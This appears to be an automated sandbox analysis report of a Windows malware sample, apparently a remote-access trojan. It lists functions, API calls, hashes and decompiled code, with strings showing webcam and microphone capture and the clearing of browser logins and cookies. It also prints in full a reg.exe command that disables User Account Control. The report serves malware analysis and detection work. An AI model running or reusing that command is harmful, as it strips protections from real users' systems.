                                    Uniqueness Score: -1.00%

                                    Function 006E8DDA, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ClassCreateErrorLastRegisterWindow
                                    • String ID: 0$MsgWindowClass
                                    • API String ID: 2877667751-2410386613
                                    • Opcode ID: 30ffbd1023df8ef96a049aba0a7e3e21d49cd07b5980c83a20cb0c2ca479ad03
                                    • Instruction ID: bb23fd438fc60a47d9daa357258d80d98ce5d2533b9046f48882a018981e7584
                                    • Opcode Fuzzy Hash: 30ffbd1023df8ef96a049aba0a7e3e21d49cd07b5980c83a20cb0c2ca479ad03
                                    • Instruction Fuzzy Hash: A00125B190131DAFDB10DF95AC849EFBBBDFB04794F40452AF904A6240EB785A058BA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00702D11, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMON
                                    Download Yara Rule
                                    APIs
                                    • ___BuildCatchObject.LIBVCRUNTIME ref: 00702D28
                                      • Part of subcall function 00703360: ___AdjustPointer.LIBCMT ref: 007033AA
                                    • _UnwindNestedFrames.LIBCMT ref: 00702D3F
                                    • ___FrameUnwindToState.LIBVCRUNTIME ref: 00702D51
                                    • CallCatchBlock.LIBVCRUNTIME ref: 00702D75
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                    • String ID: =1p
                                    • API String ID: 2633735394-1168824671
                                    • Opcode ID: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                                    • Instruction ID: 656db4ba54e21a388a2a8e138c9200a51e1f1abbd462a49846bec7e061fbc890
                                    • Opcode Fuzzy Hash: 94d24e599c38bfd0fe9448f4d259b7e070b739f8f5fce39f4dfa045fc21e001f
                                    • Instruction Fuzzy Hash: FF012932100109FBCF125F95CC09EDA3BBAFF48714F058614FA1862162C73AE862EBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DD3F7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 46processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,006DC5FB,00000000,0073C578,00000001), ref: 006DD43B
                                    • CloseHandle.KERNEL32(006DC5FB), ref: 006DD44A
                                    • CloseHandle.KERNEL32(00000027), ref: 006DD44F
                                    Strings
                                    • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 006DD431
                                    • C:\Windows\System32\cmd.exe, xrefs: 006DD436
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$CreateProcess
                                    • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                    • API String ID: 2922976086-4183131282
                                    • Opcode ID: a0e91a64d87f323cffa164b9ce2d14d1ad123cb33f14125693cc62a290d984f9
                                    • Instruction ID: a6e3fc030fe5da2d48a380b3c129aad8ced7c96cc4b44f096f8a9678b16b339f
                                    • Opcode Fuzzy Hash: a0e91a64d87f323cffa164b9ce2d14d1ad123cb33f14125693cc62a290d984f9
                                    • Instruction Fuzzy Hash: B3F062B290011CBEEB105AE9DC85EEFBB6CEB44795F000422F604E2014D5345D148AA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D519B, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44synchronizationCOMMON
                                    Download Yara Rule
                                    APIs
                                    • WaitForSingleObject.KERNEL32(?,000003E8,?,?,006D5196), ref: 006D51B1
                                    • CloseHandle.KERNEL32(?), ref: 006D5207
                                    • SetEvent.KERNEL32(?), ref: 006D5216
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: CloseEventHandleObjectSingleWait
                                    • String ID: Connection timeout$[WARNING]
                                    • API String ID: 2055531096-1470507543
                                    • Opcode ID: 0b959738b2e4896bd18429e1d1fd7638438885df53a25ca9baa0959704873c96
                                    • Instruction ID: 7800380074f8739bc4b1edf82151e63269d741fe8162c1d229d2e04717e70169
                                    • Opcode Fuzzy Hash: 0b959738b2e4896bd18429e1d1fd7638438885df53a25ca9baa0959704873c96
                                    • Instruction Fuzzy Hash: D001F231E01B80AFC731BF7A9C5646AFBE2FF05305300882EE0C382B21CB689904CB55
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006E26DB, Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 42COMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 006E271D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ExecuteShell
                                    • String ID: /C $8Em$cmd.exe$open
                                    • API String ID: 587946157-1289838226
                                    • Opcode ID: 59dfd568f2828459e5fd86dc3f501558ca451df23e3139f8986915ccffdff4ce
                                    • Instruction ID: c6d7dd9cc4da551e1d2910253cba16c3391e25e3b7d3f316c55e146d77185976
                                    • Opcode Fuzzy Hash: 59dfd568f2828459e5fd86dc3f501558ca451df23e3139f8986915ccffdff4ce
                                    • Instruction Fuzzy Hash: 91F0E671A083406BD254FBB1D8959BFB3EBAB95300F00092FB5568A292EF745E09C659
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DB82B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 39COMMON
                                    Download Yara Rule
                                    APIs
                                    • std::_Lockit::_Lockit.LIBCPMT ref: 006DB836
                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 006DB875
                                      • Part of subcall function 007003A0: _Yarn.LIBCPMT ref: 007003BF
                                      • Part of subcall function 007003A0: _Yarn.LIBCPMT ref: 007003E3
                                    • std::bad_exception::bad_exception.LIBCMT ref: 006DB88D
                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 006DB89B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throwstd::bad_exception::bad_exception
                                    • String ID: bad locale name
                                    • API String ID: 3706160523-1405518554
                                    • Opcode ID: bd47caf3aaec375782b6ce2fc00a22dadb51e58196721f8f04f3817f8c2df098
                                    • Instruction ID: fd9f530e5230abda0a4750aa4a5f07aeb1b47899d3f0f716723d3360f86d1d68
                                    • Opcode Fuzzy Hash: bd47caf3aaec375782b6ce2fc00a22dadb51e58196721f8f04f3817f8c2df098
                                    • Instruction Fuzzy Hash: 41F03131900208EBD368FA60ED57EDA73E5AF10760F50463EF545125D2AF78B909C689
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070CB8F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0070CB84,0000000C,?,0070CB24,0000000C,00738188), ref: 0070CBAF
                                    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0070CBC2
                                    • FreeLibrary.KERNEL32(00000000,?,?,?,0070CB84,0000000C,?,0070CB24,0000000C,00738188), ref: 0070CBE5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: AddressFreeHandleLibraryModuleProc
                                    • String ID: CorExitProcess$mscoree.dll
                                    • API String ID: 4061214504-1276376045
                                    • Opcode ID: ab3ab0b2ec777f5cb57673f9b694a32d594a9a8233eecb7a9ae4cb4c2d78c461
                                    • Instruction ID: 75dece3523fea1d053f1b6319c6265e4fceb0bff6c8b86452956c5d923ebc244
                                    • Opcode Fuzzy Hash: ab3ab0b2ec777f5cb57673f9b694a32d594a9a8233eecb7a9ae4cb4c2d78c461
                                    • Instruction Fuzzy Hash: 51F04470A00118FFDB269B54DC4ABAEBFF5EF04711F0042A9F905A2190DB3D5E41CA94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070B2BA, Relevance: 7.7, APIs: 5, Instructions: 222COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6ab33020fcfd1e66e80c2916e35820c225264561410ce1164b738bb0a95b7c40
                                    • Instruction ID: d4297bc3d30c19803c17df65320301edc3e0119d656c93d298b1925616353043
                                    • Opcode Fuzzy Hash: 6ab33020fcfd1e66e80c2916e35820c225264561410ce1164b738bb0a95b7c40
                                    • Instruction Fuzzy Hash: CA716C31900256DBCB218B99CC84ABEBBF5FF55320F244369E411A72D2D7789F41C7A1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D4486, Relevance: 7.7, APIs: 1, Strings: 4, Instructions: 208sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006D28D8: std::_Xinvalid_argument.LIBCPMT ref: 006D28DD
                                    • Sleep.KERNEL32(00000000,?), ref: 006D45DB
                                      • Part of subcall function 006D471E: __EH_prolog.LIBCMT ref: 006D4723
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: H_prologSleepXinvalid_argumentstd::_
                                    • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                    • API String ID: 834325642-3547787478
                                    • Opcode ID: d0f6cb936f4bb3786083112ff10932bafcb3eae8e18c4b7532448799ab5a3231
                                    • Instruction ID: ad4a995bed2528c6b22612f2e7b2a6ca11591ab62996f590d25a3a0d06d93d6a
                                    • Opcode Fuzzy Hash: d0f6cb936f4bb3786083112ff10932bafcb3eae8e18c4b7532448799ab5a3231
                                    • Instruction Fuzzy Hash: 3C513B71E04241ABCB54BB74D866AAD3B97AF86300F00402FF9469B7D2DF74CE05879A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DF6A7, Relevance: 7.7, APIs: 5, Instructions: 206memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 006DF14A: SetLastError.KERNEL32(0000000D,006DF6C6,0072F464,00000000,?), ref: 006DF150
                                    • SetLastError.KERNEL32(000000C1,0072F464,00000000,?), ref: 006DF6DD
                                    • GetNativeSystemInfo.KERNEL32(?,0072F464,00000000,?), ref: 006DF750
                                    • GetProcessHeap.KERNEL32(00000008,00000040), ref: 006DF7BC
                                    • HeapAlloc.KERNEL32(00000000), ref: 006DF7C3
                                    • SetLastError.KERNEL32(0000045A), ref: 006DF8D5
                                      • Part of subcall function 006DF65A: VirtualFree.KERNEL32(00008000,00000000,00000000,?,006DF7DC,00000000,00000000,00008000,00000000), ref: 006DF666
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast$Heap$AllocFreeInfoNativeProcessSystemVirtual
                                    • String ID:
                                    • API String ID: 486403682-0
                                    • Opcode ID: e88076d98a81b8b61d1b76041ccc465010248cf47e6419843a580d192e4ad5ee
                                    • Instruction ID: 9ac38eed6f5a1ab99846f6b30f27cc3b9f045726eef5214c8e19b572bc61f07b
                                    • Opcode Fuzzy Hash: e88076d98a81b8b61d1b76041ccc465010248cf47e6419843a580d192e4ad5ee
                                    • Instruction Fuzzy Hash: EF61E171E00201ABDB609F65CC81BAABBF7BF84700F14417BE8069B791D7B4D942DB95
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070E550, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0070F98C: HeapAlloc.KERNEL32(00000000,?,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 0070F9BE
                                    • _free.LIBCMT ref: 0070E65B
                                    • _free.LIBCMT ref: 0070E672
                                    • _free.LIBCMT ref: 0070E691
                                    • _free.LIBCMT ref: 0070E6AC
                                    • _free.LIBCMT ref: 0070E6C3
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free$AllocHeap
                                    • String ID:
                                    • API String ID: 1835388192-0
                                    • Opcode ID: 4720e96ec9ab5792099951f16eef403a3562864ad664b511f2356856543dcb26
                                    • Instruction ID: 97f67a98261e036a5fab461a4a0c3425264d4695d14b0b5913a537ebb7c81409
                                    • Opcode Fuzzy Hash: 4720e96ec9ab5792099951f16eef403a3562864ad664b511f2356856543dcb26
                                    • Instruction Fuzzy Hash: 5C51AF71A00608EFDB24DF29DC41A6AB7F4EF58720F144A6DE949D72D0E73AE951CB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0070D66D, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 8cc7f042de12760c863b0a2879f7546bdec0b789004d92667baa4aa4d77b740e
                                    • Instruction ID: ed7fe0b4eeff687378a28b108cd111d86129c1db8af2ec0d391585fd045bd7db
                                    • Opcode Fuzzy Hash: 8cc7f042de12760c863b0a2879f7546bdec0b789004d92667baa4aa4d77b740e
                                    • Instruction Fuzzy Hash: 8641D636A00304EFDB24DFB8C885A6DB3F5EF85314B158669E615EB391EB35AD01CB81
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 105CE4E0, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 83%
                                    			E105CE4E0(signed int* __ecx, signed int __edx) {
				signed int _v8;
				intOrPtr* _v12;
				signed int _v16;
				signed int _t28;
				signed int _t29;
				intOrPtr _t33;
				signed int _t37;
				signed int _t38;
				signed int _t40;
				void* _t50;
				signed int _t56;
				intOrPtr* _t57;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t74;
				signed int _t75;
				signed int _t78;
				signed int _t80;
				signed int* _t81;
				signed int _t85;
				void* _t86;

				_t72 = __edx;
				_v12 = __ecx;
				_t28 =  *__ecx;
				_t81 =  *_t28;
				if(_t81 != 0) {
					_t29 =  *0x46a00c;
					_t56 =  *_t81 ^ _t29;
					_t78 = _t81[1] ^ _t29;
					_t83 = _t81[2] ^ _t29;
					asm("ror edi, cl");
					asm("ror esi, cl");
					asm("ror ebx, cl");
					if(_t78 != _t83) {
						L14:
						 *_t78 = E105CE3A1( *((intOrPtr*)( *((intOrPtr*)(_v12 + 4)))));
						_t33 = L105BFF0F(_t56);
						_t57 = _v12;
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)))) = _t33;
						_t24 = _t78 + 4; // 0xfffffa1a
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 4)) = L105BFF0F(_t24);
						 *((intOrPtr*)( *((intOrPtr*)( *_t57)) + 8)) = L105BFF0F(_t83);
						_t37 = 0;
						L15:
						return _t37;
					}
					_t38 = 0x200;
					_t85 = _t83 - _t56 >> 2;
					if(_t85 <= 0x200) {
						_t38 = _t85;
					}
					_t80 = _t38 + _t85;
					if(_t80 == 0) {
						_t80 = 0x20;
					}
					if(_t80 < _t85) {
						L9:
						_push(4);
						_t80 = _t85 + 4;
						_push(_t80);
						_v8 = L105D8BC8(_t56);
						_t40 = E105D1068(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							goto L11;
						}
						_t37 = _t40 | 0xffffffff;
						goto L15;
					} else {
						_push(4);
						_push(_t80);
						_v8 = L105D8BC8(_t56);
						E105D1068(0);
						_t68 = _v8;
						_t86 = _t86 + 0x10;
						if(_t68 != 0) {
							L11:
							_t56 = _t68;
							_v8 = _t68 + _t85 * 4;
							_t83 = _t68 + _t80 * 4;
							_t78 = _v8;
							_push(0x20);
							asm("ror eax, cl");
							_t71 = _t78;
							_v16 = 0 ^  *0x46a00c;
							asm("sbb edx, edx");
							_t74 =  !_t72 & _t68 + _t80 * 0x00000004 - _t78 + 0x00000003 >> 0x00000002;
							_v8 = _t74;
							if(_t74 == 0) {
								goto L14;
							}
							_t75 = _v16;
							_t50 = 0;
							do {
								_t50 = _t50 + 1;
								 *_t71 = _t75;
								_t71 = _t71 + 4;
							} while (_t50 != _v8);
							goto L14;
						}
						goto L9;
					}
				}
				return _t28 | 0xffffffff;
			}

























                                    0x105ce4e0
                                    0x105ce4ea
                                    0x105ce4ee
                                    0x105ce4f0
                                    0x105ce4f4
                                    0x105ce4fe
                                    0x105ce50f
                                    0x105ce514
                                    0x105ce516
                                    0x105ce518
                                    0x105ce51a
                                    0x105ce51c
                                    0x105ce520
                                    0x105ce5da
                                    0x105ce5e8
                                    0x105ce5ea
                                    0x105ce5ef
                                    0x105ce5f6
                                    0x105ce5f8
                                    0x105ce606
                                    0x105ce615
                                    0x105ce618
                                    0x105ce61a
                                    0x00000000
                                    0x105ce61b
                                    0x105ce528
                                    0x105ce52d
                                    0x105ce532
                                    0x105ce534
                                    0x105ce534
                                    0x105ce536
                                    0x105ce53b
                                    0x105ce53f
                                    0x105ce53f
                                    0x105ce542
                                    0x105ce561
                                    0x105ce561
                                    0x105ce563
                                    0x105ce566
                                    0x105ce56f
                                    0x105ce572
                                    0x105ce577
                                    0x105ce57a
                                    0x105ce57f
                                    0x00000000
                                    0x00000000
                                    0x105ce581
                                    0x00000000
                                    0x105ce544
                                    0x105ce544
                                    0x105ce546
                                    0x105ce54f
                                    0x105ce552
                                    0x105ce557
                                    0x105ce55a
                                    0x105ce55f
                                    0x105ce589
                                    0x105ce58c
                                    0x105ce58e
                                    0x105ce591
                                    0x105ce599
                                    0x105ce59f
                                    0x105ce5a6
                                    0x105ce5a8
                                    0x105ce5b0
                                    0x105ce5bf
                                    0x105ce5c3
                                    0x105ce5c5
                                    0x105ce5c8
                                    0x00000000
                                    0x00000000
                                    0x105ce5ca
                                    0x105ce5cd
                                    0x105ce5cf
                                    0x105ce5cf
                                    0x105ce5d0
                                    0x105ce5d2
                                    0x105ce5d5
                                    0x00000000
                                    0x105ce5cf
                                    0x00000000
                                    0x105ce55f
                                    0x105ce542
                                    0x00000000

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
                                    • Instruction ID: 88cc65036f95f4701153c1c291e85af6e0d5db5adf872ab7d56fda12dbef2ddb
                                    • Opcode Fuzzy Hash: 34b32c66eb4d22029e8a4803b0364031336475c6bcc7b56bc7984bb1051fc465
                                    • Instruction Fuzzy Hash: CF410476A002009FCB14DFB8C985A5EBBBAEF85714F164569E505EB380E731FD01DB80
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 105C63FD, Relevance: 7.6, APIs: 5, Instructions: 116COMMON
                                    Download Yara Rule
                                    C-Code - Quality: 22%
                                    			E105C63FD(void* __edx, void* __eflags, char* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* __ebx;
				char* _t31;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t51;
				char _t52;
				intOrPtr _t54;
				void* _t56;
				void* _t63;
				void* _t64;
				void* _t67;

				E105C637A(_t51,  &_v28, __edx, _a24);
				_t52 = 0;
				_t54 =  *((intOrPtr*)(_v24 + 0x14));
				_t31 = _a4;
				_v8 = _t54;
				if(_t31 == 0) {
					L4:
					 *((intOrPtr*)(E105CB377())) = 0x16;
					E105C77D0();
					L18:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return _t52;
				}
				_t66 = _a8;
				if(_a8 == 0) {
					goto L4;
				}
				 *_t31 = 0;
				if(_a12 == 0 || _a16 == 0) {
					goto L4;
				} else {
					_t35 =  *0x4532cc(_t54, 0, _a12, 0xffffffff, 0, 0);
					_v12 = _t35;
					if(_t35 != 0) {
						_t64 = E105D07FF(_t54, _t35 + _t35);
						_t56 = _t63;
						if(_t64 != 0) {
							_push(_v12);
							_push(_t64);
							_push(0xffffffff);
							_push(_a12);
							_push(0);
							_push(_v8);
							if( *0x4532cc() != 0) {
								_t67 = E105D07FF(_t56, _t66 + _t66);
								if(_t67 != 0) {
									_t43 = E105D22C6(0, __edx, _t67, _a8, _t64, _a16, _a20, _a24);
									_v12 = _t43;
									if(_t43 != 0) {
										_push(0);
										_push(0);
										_push(_a8);
										_push(_a4);
										_push(0xffffffff);
										_push(_t67);
										_push(0);
										_push(_v8);
										if( *0x4532d8() != 0) {
											_t52 = _v12;
										} else {
											E105CB341( *0x453234());
										}
									}
								}
								E105D1068(_t67);
							} else {
								E105CB341( *0x453234());
							}
						}
						E105D1068(_t64);
					} else {
						E105CB341( *0x453234());
					}
					goto L18;
				}
			}



















                                    0x105c640d
                                    0x105c6415
                                    0x105c6417
                                    0x105c641a
                                    0x105c641d
                                    0x105c6422
                                    0x105c6437
                                    0x105c643c
                                    0x105c6442
                                    0x105c6514
                                    0x105c6518
                                    0x105c651d
                                    0x105c651d
                                    0x105c652b
                                    0x105c652b
                                    0x105c6424
                                    0x105c6429
                                    0x00000000
                                    0x00000000
                                    0x105c642b
                                    0x105c6430
                                    0x00000000
                                    0x105c644c
                                    0x105c6455
                                    0x105c645b
                                    0x105c6460
                                    0x105c647d
                                    0x105c647f
                                    0x105c6482
                                    0x105c6488
                                    0x105c648b
                                    0x105c648c
                                    0x105c648e
                                    0x105c6491
                                    0x105c6492
                                    0x105c649d
                                    0x105c64b6
                                    0x105c64bb
                                    0x105c64cb
                                    0x105c64d3
                                    0x105c64d8
                                    0x105c64da
                                    0x105c64db
                                    0x105c64dc
                                    0x105c64df
                                    0x105c64e2
                                    0x105c64e4
                                    0x105c64e5
                                    0x105c64e6
                                    0x105c64f1
                                    0x105c6502
                                    0x105c64f3
                                    0x105c64fa
                                    0x105c64ff
                                    0x105c64f1
                                    0x105c64d8
                                    0x105c6506
                                    0x105c649f
                                    0x105c64a6
                                    0x105c64a6
                                    0x105c650b
                                    0x105c650d
                                    0x105c6462
                                    0x105c6469
                                    0x105c646e
                                    0x00000000
                                    0x105c6460

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.410957066.0000000010590000.00000040.00000001.sdmp, Offset: 10590000, based on PE: true
                                    Yara matches
                                    Similarity
                                    • API ID: __dosmaperr$_free
                                    • String ID:
                                    • API String ID: 242264518-0
                                    • Opcode ID: 7eda0840fabd0fd668bfc2178d3953f8096d7b1bca186f1ed6d2dd42c853aa18
                                    • Instruction ID: 05ffa05f42836130a1d39b8eccef98002e6591bb41f5d08dff1286577cf09fe7
                                    • Opcode Fuzzy Hash: 7eda0840fabd0fd668bfc2178d3953f8096d7b1bca186f1ed6d2dd42c853aa18
                                    • Instruction Fuzzy Hash: 8631A07640064ABBDF019FE48E89AAF3F6CEF492A1F600169F81096190DB31EA11DB71
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 007193AC, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                    Download Yara Rule
                                    APIs
                                    • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,006F8E1A,?,?,?,00000001,?,?,00000001,006F8E1A,006F8E1A), ref: 007193F9
                                    • __alloca_probe_16.LIBCMT ref: 00719431
                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,006F8E1A,?,?,?,00000001,?,?,00000001,006F8E1A,006F8E1A,?), ref: 00719482
                                    • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,006F8E1A,006F8E1A,?,00000002,?), ref: 00719494
                                    • __freea.LIBCMT ref: 0071949D
                                      • Part of subcall function 0070F98C: HeapAlloc.KERNEL32(00000000,?,?,?,006FF244,?,?,006D1696,?,?,?,?,?), ref: 0070F9BE
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: ByteCharMultiWide$AllocHeapStringType__alloca_probe_16__freea
                                    • String ID:
                                    • API String ID: 1857427562-0
                                    • Opcode ID: 8dc96b51195e534c23c5976c1d3276e954f1ecf3ff43060bb031c04bfb8e5c08
                                    • Instruction ID: bf07a05af39d6a7c17b54392a62e3909b61317d370aa2ed1f17596422d60a464
                                    • Opcode Fuzzy Hash: 8dc96b51195e534c23c5976c1d3276e954f1ecf3ff43060bb031c04bfb8e5c08
                                    • Instruction Fuzzy Hash: E731CC72A0020AABDF249F68DC55DEF7BA5EB00710F044128FD08D6191E739DD92CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006DA523, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 103sleepCOMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    • [Info], xrefs: 006DA61B
                                    • Cleared browsers logins and cookies., xrefs: 006DA60C
                                    • [Cleared browsers logins and cookies.], xrefs: 006DA5FB
                                    Memory Dump Source
                                    • Source File: 0000001C.00000002.409473011.00000000006D0000.00000040.00000001.sdmp, Offset: 006D0000, based on PE: true
                                    • Associated: 0000001C.00000002.409660028.000000000073F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: Sleep
                                    • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.$[Info]
                                    • API String ID: 3472027048-899236412
                                    • Opcode ID: e15ae621cd0769ea7a26e14c8a290fa67a3acaba6eab2e53d8f6be95a260b7e6
                                    • Instruction ID: 0b74fe58949329a312a99b4b25a3f99f57bc51170a97e2eab12ed1215d21094e
                                    • Opcode Fuzzy Hash: e15ae621cd0769ea7a26e14c8a290fa67a3acaba6eab2e53d8f6be95a260b7e6
                                    • Instruction Fuzzy Hash: 6B31E421E4D3C16EDA126BF838267FA6B930F53754F09806FF8D00B393D9964808936B
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 006D1BCD, Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 006D1BDD
                                    • waveInOpen.WINMM(0073BAB0,000000FF,0073BA98,Function_00001CEF,00000000,00000000,00000024), ref: 006D1C73
                                    • waveInPrepareHeader.WINMM(0073BA78,00000020), ref: 006D1CC7
                                    • waveInAddBuffer.WINMM(0073BA78,00000020), ref: 006D1CD6
